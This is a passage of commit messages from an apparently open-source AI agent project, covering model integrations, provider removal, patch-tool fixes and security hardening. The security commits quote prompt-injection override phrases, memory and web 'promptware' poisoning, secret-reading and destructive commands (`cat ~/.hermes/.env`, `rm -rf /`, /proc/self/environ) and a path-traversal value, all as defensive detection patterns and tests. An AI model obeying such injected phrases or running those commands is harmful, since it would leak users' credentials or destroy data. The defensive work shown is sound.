'hermes tools' model picker alongside flux-2, gpt-image, nano-banana,
etc. Users who already bill through FAL or Nous Portal subscription
can now use Krea without registering directly with Krea.
Model IDs (as listed in fal's launch announcement):
fal-ai/krea/v2/medium/text-to-image — $0.030 / image
fal-ai/krea/v2/large/text-to-image — $0.060 / image
Both share the same parameter schema:
- aspect_ratio (1:1, 4:3, 3:2, 16:9, 2.35:1, 4:5, 2:3, 9:16)
mapped from our 3 abstract ratios via size_style='aspect_ratio'
- creativity (raw|low|medium|high; default medium)
- seed (reproducibility)
- image_style_references (up to 10 per Krea's API spec)
No num_inference_steps / guidance_scale / num_images — Krea 2 does
not expose those, and the supports-set filter strips them defensively
if the agent ever passes them.
This is the FAL-routed variant. The separate native-Krea-API plugin
shipped in PR #33236 (plugins/image_gen/krea/) remains available for
users who want to bill directly through Krea's API with their own
key. Both routes converge on the same underlying model.
Nous Portal managed-FAL gateway: this commit makes the model IDs
known to the catalog and the picker. The Portal team will need to
allowlist these two endpoint slugs on the fal-queue origin server-side
for them to flow through the managed billing path.
Self-review follow-ups on the salvage of #33177 + #33188 + #33209:
W3 (real, lock_path.write_text was non-atomic AND the read path silently
resets data to an empty installed dict on JSONDecodeError — a crash mid-
write could nuke ALL hub provenance, not just official-optional). Switch
to the same mkstemp + fsync + atomic_replace pattern that _write_manifest
already uses in this module.
W5 (dead code) — _validate_category_name had one caller on origin/main
(install_from_quarantine), swapped to _validate_install_parent_path by
#33177. Remove the now-unused definition to avoid the attractive-nuisance
of contributors picking the wrong validator.
Behavior preserved on the happy path; verified all 200 skills/hub tests
plus the three E2E scenarios (destructive restore, backfill idempotency,
adversarial nonexistent skill) still pass after both fixes.
Background processes whose command contains `gh pr view --json
statusCheckRollup` or `gh pr checks | jq` now get a runtime hint in
the result pointing at the canonical green-ci-policy snippets. The
homebrew shape has caused at least seven silent CI-watcher failures
in the past two weeks (#31329, #31448, #31695, #31709, #31745,
#32264, #33131) — each one a different jq/awk/grep variation of the
same fundamental problem (stdout buffering, jq null-key edge cases,
conclusion-vs-status confusion, TTY-only banner grepping).
The skill that documents this anti-pattern is excellent, but a skill
only fires if the agent loads it. The tool surface fires on every
misuse. This is the embed-footguns-in-tool-surface pattern from
PR #31289 applied to a recurring failure mode that's outgrown
skill-only enforcement.
Detector is deliberately narrow — flags two specific shapes:
1. Any command containing `statusCheckRollup` (the JSON-API path —
conclusion vs status field semantics keep burning us).
2. `gh pr view` / `gh pr checks` combined with `jq` (gh pr
checks doesn't emit JSON, so any `| jq` here is confused intent;
the canonical column-2 poller uses awk-on-tabs, not jq).
Does NOT flag the blessed column-2 awk-on-tabs poller (which uses
`awk -F"\t" "\==\"pending\""`) or the exit-code-driven
`gh pr checks $PR >/dev/null` snippet.
Hint composes with the existing background-without-notify_on_complete
hint — both can fire on the same call. Each is independently
actionable.
Tests:
- 4 new cases in tests/tools/test_notify_on_complete.py
- test_homebrew_ci_poller_via_statusCheckRollup_emits_hint (positive)
- test_homebrew_ci_poller_via_gh_pr_checks_piped_to_jq_emits_hint (positive)
- test_canonical_column2_awk_poller_does_not_emit_homebrew_hint (negative)
- test_canonical_gh_pr_checks_exit_code_loop_does_not_emit_hint (negative)
- test_non_ci_background_command_does_not_emit_homebrew_hint (negative)
- 30/30 passing (was 26)
* remove Vercel AI Gateway provider and Vercel Sandbox terminal backend
Both Vercel-hosted integrations are removed end-to-end. Users on the AI
Gateway should switch to OpenRouter or one of the other aggregators
(Nous Portal, Kilo Code). Users on the Vercel Sandbox backend should
switch to Docker, Modal, Daytona, or SSH.
What's removed:
- `plugins/model-providers/ai-gateway/` provider plugin
- `hermes_cli/vercel_auth.py` Vercel-Sandbox auth helper
- `tools/environments/vercel_sandbox.py` terminal backend
- `ai-gateway` provider wiring across auth, doctor, setup, models,
config, status, providers, main, web_server, model_normalize, dump
- `vercel_sandbox` backend wiring across terminal_tool, file_tools,
code_execution_tool, file_operations, approval, skills_tool,
environments/local, credential_files, lazy_deps, prompt_builder,
cli, gateway/run
- `AI_GATEWAY_BASE_URL` constant, `_AI_GATEWAY_HEADERS` auxiliary-client
header set, run_agent base-URL header/reasoning special-cases
- `[vercel]` pyproject extra and `vercel`/`vercel-workers` from uv.lock
- env vars: `AI_GATEWAY_API_KEY`, `AI_GATEWAY_BASE_URL`, `VERCEL_TOKEN`,
`VERCEL_PROJECT_ID`, `VERCEL_TEAM_ID`, `VERCEL_OIDC_TOKEN`,
`TERMINAL_VERCEL_RUNTIME`
- Tests: deletes test_ai_gateway_models.py and
test_vercel_sandbox_environment.py; scrubs references across 23
surviving test files (no entire tests deleted unless they were
dedicated to AI Gateway / Sandbox)
- Docs: provider tables, env-var reference, setup guides, security
notes, tool config, terminal-backend tables — English plus zh-Hans
i18n parity
- `hermes-agent` skill: provider table entry and remote-backend list
What stays (intentional):
- `popular-web-designs/templates/vercel.md` — CSS design reference,
unrelated to Vercel-the-AI-product
- `x-vercel-id` in `stream_diag.py` headers — generic Vercel CDN
response header, useful diag signal on any Vercel-hosted endpoint
- `vercel-labs/agent-browser` URL in browser config — lightpanda
browser project, different OSS effort
- `userStories.json` historical contributor entry mentioning Vercel
Sandbox — archive, not active docs
Validation:
- 1153 tests in the 22 targeted files pass (`scripts/run_tests.sh`)
- Full repo `py_compile` clean
- Live import of every touched module + invariant check (no
`ai-gateway` in `PROVIDER_REGISTRY`, no `_AI_GATEWAY_HEADERS`, no
`vercel_sandbox` in `_REMOTE_TERMINAL_BACKENDS`)
* test: convert profile-count check from change-detector to invariant
The hardcoded "== 34" assertion broke when ai-gateway was removed.
Per AGENTS.md change-detector-test guidance, assert the relationship
(registry count >= number of plugin dirs) instead of a literal count.
Counts shift when providers are added/removed; that's expected.
Grok models (and other LLMs) sometimes omit the schedule parameter
when calling the cronjob tool with action=create because the schema
only listed 'action' in required[] and the schedule description did
not explicitly state it was mandatory (issue #32427).
Fix: update schema descriptions to clearly state schedule is REQUIRED
for action=create, making this explicit for models that rely on
description text for parameter compliance.
Fixes#32427
Follow-up on top of @TheOnlyMika's #32155 cherry-pick. The defusedxml
hardening import was unconditional, which would break the gateway for
anyone running a WeComCallback adapter without the (transitive-only)
defusedxml present.
- Wrap the import in the same try/except pattern as aiohttp/httpx in
the same file. Sets DEFUSEDXML_AVAILABLE flag.
- Extend check_wecom_callback_requirements() to gate on the flag, so
the gateway logs the actual missing dep and skips the adapter
instead of crashing.
- Add [wecom] extra to pyproject.toml with defusedxml==0.7.1.
- Register platform.wecom_callback in tools/lazy_deps.py so users get
prompted to install it on first WeComCallback configuration, same
pattern as discord/slack/matrix.
defusedxml is still the right call for pre-auth XML parsing — this
commit just makes the dep declarative and recoverable instead of a
hard import-time crash.
The Skills Hub page was stuck on a stale Feb 25 snapshot, showing only Built-in
+ Optional + Anthropic + LobeHub. The unified index already has 2078 skills
from skills.sh / ClawHub / LobeHub / GitHub taps / Claude Marketplace, and
BrowseShSource adds another ~330 — none of it was reaching the page.
Changes:
- website/scripts/extract-skills.py: read website/static/api/skills-index.json
(the unified multi-source catalog, rebuilt twice daily) as the canonical
external source. Keep the legacy skills/index-cache/ fallback for offline
builds. Add friendly per-source labels (skills.sh, ClawHub, browse.sh,
OpenAI, HuggingFace, Anthropic, LobeHub, etc.) and per-entry installCmd.
- website/src/pages/skills/index.tsx: add source pills + ordering for the 11
new sources; render installCmd from the index entry.
- website/scripts/prebuild.mjs: when no local skills-index.json exists, fetch
the live one from hermes-agent.nousresearch.com so local 'npm run build'
matches production without burning GitHub API quota.
- scripts/build_skills_index.py: crawl BrowseShSource so browse.sh entries
land in the unified index. Adjust source_order.
- tools/skills_hub.py: GitHubSource.DEFAULT_TAPS — openai/skills moved its
skills into skills/.curated/ and skills/.system/, so add both as explicit
taps (the listing code skips dotted dirs by design). Drop
VoltAgent/awesome-agent-skills (README-only, no SKILL.md files) and
MiniMax-AI/cli (singular skill, not a tap directory). Net effect: github
source jumps from 83 → 143 skills, with OpenAI properly included.
- .github/workflows/deploy-site.yml: build the unified index BEFORE running
extract-skills.py — previous order meant extract-skills always fell back
to the legacy cache. Drop the 'skip if file exists' guard; the file is
gitignored and must be rebuilt every deploy.
- .github/workflows/skills-index.yml: drop the broken 'deploy-with-index'
job (it cp'd 'landingpage/\*' which no longer exists, failing every cron
run since the landingpage move). Replace it with a workflow_dispatch
trigger of deploy-site.yml so the index refresh still reaches production
on schedule.
- website/docs/user-guide/features/skills.md: drop VoltAgent from the
default-taps doc list to match the code.
Before: 695 skills (Built-in 90, Optional 84, Anthropic 16, LobeHub 505).
After: 2168 skills across 9 source pills, including the 1212 skills.sh
entries the user expected to see.
The runtime cron prompt scanner (added in #3968 to plug the
"malicious skill carrying an injection payload" gap) reuses the same
critical-severity patterns as the create-time user-prompt scan against
the *assembled* prompt — which includes loaded skill markdown.
That works fine for narrow patterns like "ignore previous instructions"
which never legitimately appear in prose. It catastrophically false-
positives on command-shape patterns like `cat ~/.hermes/.env`,
`authorized_keys`, `/etc/sudoers`, and `rm -rf /`, which routinely
appear in security postmortems and runbooks as **descriptive prose**
about attacks, not as actual commands.
Concrete failure: the bundled `hermes-agent-dev` skill contains a
security postmortem section saying "the attacker could just
`cat ~/.hermes/.env`". Every PR-scout cron job that loaded this skill
was silently blocked with `Blocked: prompt matches threat pattern
'read_secrets'`. All 11 scout jobs failed for weeks.
Fix: split the scanner into two tiers and route by context:
- `_scan_cron_prompt` (strict, unchanged behavior) runs against
the small user-authored cron prompt at create/update and as a
runtime defense-in-depth when no skills are attached. A legit
user prompt has no business saying `cat .env`, so the strict
patterns still apply there.
- `_scan_cron_skill_assembled` (new, looser) runs against the
assembled prompt when skills are attached. It only catches
unambiguous prompt-injection directives ("ignore previous
instructions", "disregard your rules", "system prompt override",
"do not tell the user") plus invisible-unicode markers. Command-
shape patterns are dropped because they false-positive on prose.
This is defense-in-depth, not the only line of defense. Skill bodies
are already scanned at install time by `skills_guard.py`; the runtime
cron scan exists purely as a tripwire for an obvious injection
directive surviving a malicious install. Catching prose mentions of
commands was never the goal of #3968 — the test that planted a skill
containing `cat ~/.hermes/.env` was the wrong shape of test for the
threat model.
Tests:
- `_scan_cron_prompt` strict behavior preserved (56 existing tests
unchanged: bare `cat .env`, `rm -rf /`, etc. still block).
- New `TestScanCronSkillAssembled` class verifies the looser scanner:
injection / disregard / system-override / do-not-tell-the-user /
invisible-unicode still block; descriptive prose about attack
commands is allowed; GitHub auth-header allowlist still works.
- `test_skill_with_env_exfil_payload_raises` (planted `cat .env`
in skill body) replaced with `test_skill_with_env_exfil_command
_in_prose_is_allowed` documenting the new correct behavior with
the real-world postmortem-style example that triggered the bug.
- All 11 originally-failing PR-scout jobs validated end-to-end via
`_build_job_prompt` — assembled prompts now build successfully
with the `hermes-agent-dev` skill attached.
Total: 75/75 tests in cron + cronjob_tools + threat scanner pass;
544/544 across the wider cron / memory / threat-pattern surface.
Three granular patch-tool refinements from the Roo Code deep-dive (#507).
## Indentation preservation (fuzzy_match.py)
When fuzzy_find_and_replace matches via a non-exact strategy, the file's
indentation may differ from what the LLM sent in old_string/new_string
(common case: model sends zero-indent old/new for a method body that
lives inside an 8-space-indented class). Before this commit the
replacement was spliced in verbatim, producing a file with a broken
indent level that may still parse but is logically wrong.
The fix computes the indent delta between old_string's first meaningful
line and the matched region's first meaningful line, then re-indents
every line of new_string by that delta. Exact-strategy matches are
untouched (passthrough). Same approach as Roo Code's
multi-search-replace.ts:466-500.
## CRLF preservation (file_operations.py)
Models nearly always send tool args with bare LF endings (JSON-encoded),
but the file on disk may have CRLF (Windows-line-ending configs, .bat,
.cmd, .ini files). Before this commit:
- write_file silently normalized CRLF to LF on every overwrite
- patch produced mixed-ending files: the substituted region had LF,
the surrounding context kept CRLF
The fix detects the file's existing line endings (via pre_content if
already read for lint/LSP, otherwise a tiny head -c 4096 probe), and
normalizes the entire write to that ending. New files are written
verbatim (no detection possible).
## Per-file failure escalation (file_tools.py)
When the agent fails to patch the same file 3+ times in a row, the
existing 'old_string not found' hint isn't strong enough — the model
keeps retrying with variations against a stale view of the file.
The fix tracks consecutive failures per (task_id, resolved_path) and
injects an escalating hint after 3 failures: 'This is failure #N
patching X. Stop retrying. Either re-read fresh, use longer context,
or fall back to write_file.' Counter resets on a successful patch to
the same path.
## Validation
- 22 new tests across tests/tools/test_fuzzy_match.py (5),
test_line_ending_preservation.py (12), test_patch_failure_tracking.py (5)
- All existing tests pass (165/165 in the touched files)
- E2E verified with real _handle_patch / _handle_write_file calls
against real CRLF files and real failure loops
Closes part of #507. The remaining open items in #507 (2b start_line
hint, behavioral rules) were declined after audit:
- 2b adds schema bloat for a problem the existing 'multiple matches'
contract already handles
- Behavioral rules conflict with the personality system
Items 1, 2d, 2e, 3, 4 of #507 were already landed in earlier work.
Hardens the context window against Brainworm-class promptware attacks
(see #496). Three changes:
1. tools/threat_patterns.py — single source of truth for injection/promptware
patterns. Replaces the duplicated pattern lists in prompt_builder.py and
memory_tool.py. Adds ~15 new Brainworm/C2 patterns (node registration,
heartbeat/beacon, pull tasking, anti-forensic disk avoidance, identity
override, known framework names). Three scopes — 'all' (narrow, classic
injection), 'context' (adds promptware/role-play, broader detection),
'strict' (adds persistence/SSH-backdoor patterns for user-mediated writes).
2. MemoryStore.load_from_disk() now scans entries at snapshot-build time.
Poisoned entries are replaced with [BLOCKED: ...] placeholders in the
frozen system-prompt snapshot. Live state keeps the original so the
user can still inspect + remove via memory(action=read/remove). Scan is
deterministic from disk bytes — prefix-cache invariant holds.
3. make_tool_result_message() wraps results from high-risk tools
(web_extract, web_search, browser_*, mcp_*) in
<untrusted_tool_result source="...">...</untrusted_tool_result>
delimiters with framing prose telling the model the content is data,
not instructions. Architectural defense against indirect injection
from poisoned web pages, GitHub issues, MCP responses — does NOT
regex-scan tool results (pattern arms race + per-iteration latency).
Multimodal content lists pass through unwrapped to preserve adapter
compatibility.
Pattern philosophy: anchor on C2-specific vocabulary or unambiguous attack
behavior, NOT on bossy English. Dropped patterns suggested in #496 that
would have tripped legitimate content: standalone 'you are obligated to',
'do not respond immediately', 'you must X' without a C2-verb anchor.
Validation:
- 257/257 targeted tests pass (test_threat_patterns + test_memory_tool +
test_tool_dispatch_helpers + test_prompt_builder)
- E2E run with real Brainworm payload: blocked from AGENTS.md context-file
path, blocked from MEMORY.md snapshot, wrapped in delimiters when
arriving via web_extract. Legitimate 'you must follow conventions'
phrasing not flagged.
Explicitly NOT in this PR (per #496 discussion):
- Per-tool-result regex scanning (pattern arms race)
- SessionBehaviorMonitor / polling-loop detection (wrong layer)
- Outbound network gating (Docker backend already covers this)
- security.context_scanning warn|block knob (current behavior is always
block-with-placeholder — there's no warn mode that makes sense)
Closes#496 for Phase 1 + the architectural delimiter piece of Phase 2.
Phase 3 stays in tracking issue territory.
_apply_xai_auto_speech_tags runs two independent transformations:
1. paragraph breaks (\n\n) → " [pause] "
2. first-sentence boundary → " [pause] "
Both fired unconditionally, so multi-paragraph input produced
"Hello world. [pause] [pause] Second paragraph." — an unnatural
double pause in the TTS audio.
Guard the first-sentence substitution with _XAI_SPEECH_TAG_RE.search(clean):
if the paragraph pass already inserted a [pause] tag, skip the
first-sentence pass. Single-paragraph behavior is unchanged.
Validate Skills Hub lock-file install paths at both ends of the
lifecycle so a poisoned or malformed lock.json entry cannot drive
shutil.rmtree to a location outside SKILLS_DIR:
- HubLockFile.record_install rejects empty/'.'/absolute/traversal/
Windows-drive paths at write time, and requires the final path
component to match the skill name (shape: '<skill>' or
'<category>/<skill>').
- install_from_quarantine resolves its destination through the same
validator, catching symlink/junction redirects inside skills/.
- uninstall_skill resolves the lock entry through the new validator
before rmtree. Refuses anything that resolves to SKILLS_DIR itself
(empty/dot paths) or to a target outside SKILLS_DIR (absolute paths,
traversal, symlinked dirs in skills/ pointing outward).
- 14 focused regression tests covering each rejection class plus a
symlink-redirect case.
E2E verified: hand-crafted poisoned lock.json entries (absolute path,
empty install_path, traversal) all refuse and leave the targeted
victim untouched; legitimate uninstall still succeeds.
Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>
When an MCP server triggers OAuth at startup, the user can now type 'skip'
(or 'cancel', 's', 'n', 'no', 'q', 'quit') at the paste prompt + Enter to
exit the flow cleanly and continue agent startup without that server.
Previously the only ways to bypass an unwanted OAuth prompt were:
- Wait the full 5-minute paste timeout
- Ctrl+C (also kills the whole reload, may leave half-state)
- Edit config.yaml to set 'enabled: false' on the server
Skip writes a sentinel to result['error'] which _wait_for_callback maps to
OAuthNonInteractiveError('user_skipped'). mcp_tool already classifies that
as an auth error in _is_auth_error() and the reconnect loop logs it as
'not retrying automatically' — server stays disconnected for the session,
other MCP servers continue normally, no infinite retry burn.
The skip message tells users how to re-auth later ('hermes mcp login') or
disable persistently ('enabled: false'), so they don't have to remember.
14 new tests covering: case-insensitive skip parsing, all 7 skip tokens,
skip not stomping an HTTP-listener win, skip routed to skip path rather
than URL-parse path, sentinel mapped to OAuthNonInteractiveError, prompt
mentions the skip option.
The CLI status bar tracked /background agent tasks (▶ N) but not shell
processes spawned via terminal(background=true). Both kinds of work can
run concurrently and a user has no in-bar signal for shell processes.
Add an independent indicator (⚙ N) sourced from
tools.process_registry.process_registry._running. The two indicators
render side-by-side when both are active (▶ 1 │ ⚙ 2), hidden when their
count is zero. Renders at all four status-bar tiers (text fallback +
prompt_toolkit fragments, narrow + wide widths). The narrow <52 tier
still drops both for space — unchanged.
New ProcessRegistry.count_running() returns len(_running) without
acquiring _lock; CPython dict len is atomic and we're polling on every
status-bar tick, so lock-free is the right tradeoff.
When the user runs OAuth on a remote/SSH machine without a port forward,
the OAuth provider redirects to http://127.0.0.1:<port>/callback which
only the listener on the remote machine can receive — the user's browser
on another box just shows a connection error.
_wait_for_callback() now races the HTTP listener against a stdin reader
on interactive TTYs. The user can copy the URL from the browser's address
bar after authorization (which contains code=...&state=...) and paste it
back at the prompt. Whichever fills the result dict first wins; the HTTP
listener remains the primary path for local sessions and SSH tunnels.
Accepts any of:
- Full local redirect URL: http://127.0.0.1:N/callback?code=...&state=...
- Provider URL after redirect: https://mcp.linear.app/callback?code=...&state=...
- Just the query string: ?code=...&state=... or code=...&state=...
The paste thread only spawns when _is_interactive() is true, preserving
the existing 'no input() in headless runs' invariant — verified by
TestWaitForCallbackPasteIntegration.test_paste_prompt_NOT_shown_when_noninteractive.
The SSH-session hint in _redirect_handler is updated to surface the paste
option as the primary remedy, with ssh -L tunneling as the alternative.
text_to_speech_tool accepts an explicit output_path. Without a traversal
guard, a path containing '..' components (whether prompt-injection-
controlled, from a confused skill, or just a buggy caller) could escape
its declared base and write the audio to a system location — e.g.
`output_path='audio/../../etc/cron.d/x'` lands the file outside the
intended audio cache.
Reject '..' components in the user-supplied path. Explicit absolute
paths are unchanged (the agent legitimately writes audio wherever the
user/caller asks); only traversal-style escapes are blocked. The
terminal tool can still write anywhere with approval — this just keeps
the unattended TTS surface from materializing files via traversal.
Regression tests cover: '..' in the middle (audio/../../etc/...),
bare '..' prefix, and the negative cases (absolute paths + relative
paths without '..' both pass through unchanged).
Salvaged from PR #6693 by @aaronlab. The original PR confined output to
DEFAULT_OUTPUT_DIR-or-cwd, which broke 9 existing tests that legitimately
write to tmp_path locations. The traversal-only check covers the actual
threat (path-escape via '..' from prompt injection) without restricting
where users can choose to write their audio.
The remaining pieces of #6693 (skill_commands rglob symlink rejection,
delegate_tool batch prefix display) are dropped:
- skill_commands rglob: breaks the documented design supporting
~/.hermes/skills/<name> as a symlink to a checked-out skill elsewhere
(see comment at agent/skill_commands.py:73-75)
- delegate_tool batch prefix: pure UX, doesn't belong in a security PR
Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>
* fix(transcription): reject symlinked audio inputs
Validation runs before provider selection, so rejecting symbolic-link paths there prevents supported-extension links from being treated as normal audio files. Use os.path.islink to avoid perturbing the existing Path.stat error path and to reject links before resolving targets.
Constraint: Keep validation platform-safe and avoid requiring symlink support where unavailable.
Rejected: Use Path.is_symlink | it consumes pathlib stat calls and broke the existing stat error regression.
Confidence: high
Scope-risk: narrow
Directive: Keep path hardening in _validate_audio_file before provider dispatch.
Tested: source venv/bin/activate && python -m pytest tests/tools/test_transcription_tools.py::TestValidateAudioFileEdgeCases -q (5 passed)
Tested: source venv/bin/activate && python -m pytest tests/tools/test_transcription_tools.py::TestValidateAudioFileEdgeCases tests/tools/test_transcription_tools.py::TestTranscribeAudioDispatch::test_invalid_file_short_circuits -q (6 passed)
Tested: source venv/bin/activate && python -m compileall tools/transcription_tools.py tests/tools/test_transcription_tools.py
Tested: git diff --check
Not-tested: Full tests/tools/test_transcription_tools.py under .[dev] only; existing faster_whisper optional dependency tests fail with ModuleNotFoundError.
* Keep transcription tests independent of optional whisper install
The transcription suite mocks faster-whisper directly, so a minimal test stub keeps the branch verifiable in environments where the optional package is not installed. This preserves the existing mock-based coverage without adding a dependency.
Constraint: faster-whisper is an optional local STT dependency and is absent from the current validation environment
Rejected: Install faster-whisper just for branch validation | would add heavyweight environment coupling outside the patch scope
Confidence: high
Scope-risk: narrow
Directive: Keep this as a test-only stub unless production import semantics change
Tested: pytest tests/tools/test_transcription_tools.py -q
---------
Co-authored-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>
* fix: reject read_file symlinks to blocking devices
The read_file guard already refused direct device paths such as /dev/zero, but a workspace symlink resolving to one of those devices could still reach the shell-backed read path and hang on wc/head/sed. Keep the literal alias check and add a resolved-path pass so local symlinks to blocked device/fd endpoints are rejected before I/O.
Constraint: Preserve literal /dev/stdin handling before terminal-specific realpath resolution
Confidence: high
Scope-risk: narrow
Tested: pytest tests/tools/test_file_read_guards.py tests/tools/test_file_tools.py -q; python -m compileall tools/file_tools.py tests/tools/test_file_read_guards.py; git diff --check
Signed-off-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>
* Keep file guard tests off sensitive macOS temp paths
The branch now inherits a sensitive-path write guard from upstream main. On macOS, tempfile.mkdtemp() resolves under /private/var/folders, so the new write-path guard fired before the file read dedup assertions could exercise their intended behavior. The tests now create their scratch files inside the worktree temp checkout, outside those system-sensitive prefixes, without changing production behavior.
Constraint: Rebased branch must pass the expanded file read guard suite on macOS.
Rejected: Loosen the production sensitive-path prefix list | broader behavior change unrelated to this PR.
Confidence: high
Scope-risk: narrow
Tested: pytest tests/tools/test_file_read_guards.py -q
---------
Signed-off-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>
Co-authored-by: WuKongAI-CMU <210765158+WuKongAI-CMU@users.noreply.github.com>
The read_file tool and terminal cat can access /proc/self/environ to
recover all process env vars including secrets stripped by the subprocess
blocklist. Output redaction partially mitigates (catches known-format
tokens) but misses custom/proprietary key formats, especially when
values are printed without their key names.
Add /proc/*/environ, /proc/*/cmdline, and /proc/*/maps to the blocked
device paths in _is_blocked_device():
- /proc/*/environ: leaks full process env (API keys, tokens)
- /proc/*/cmdline: leaks command-line args (may contain passwords)
- /proc/*/maps: leaks memory layout (ASLR bypass for exploitation)
Legitimate /proc reads (cpuinfo, meminfo, uptime, version) remain
accessible — the check only blocks per-pid pseudo-files with known
sensitive suffixes.
Complements PR #4432 (PID namespace isolation for child processes)
which prevents children from reading the parent's /proc, but does not
prevent the parent process itself from being read via file tools.
Partially addresses #4427
Changes:
tools/file_tools.py | +6
tests/tools/test_file_read_guards.py | +18 -1
Co-authored-by: dsr-restyn <dsr-restyn@users.noreply.github.com>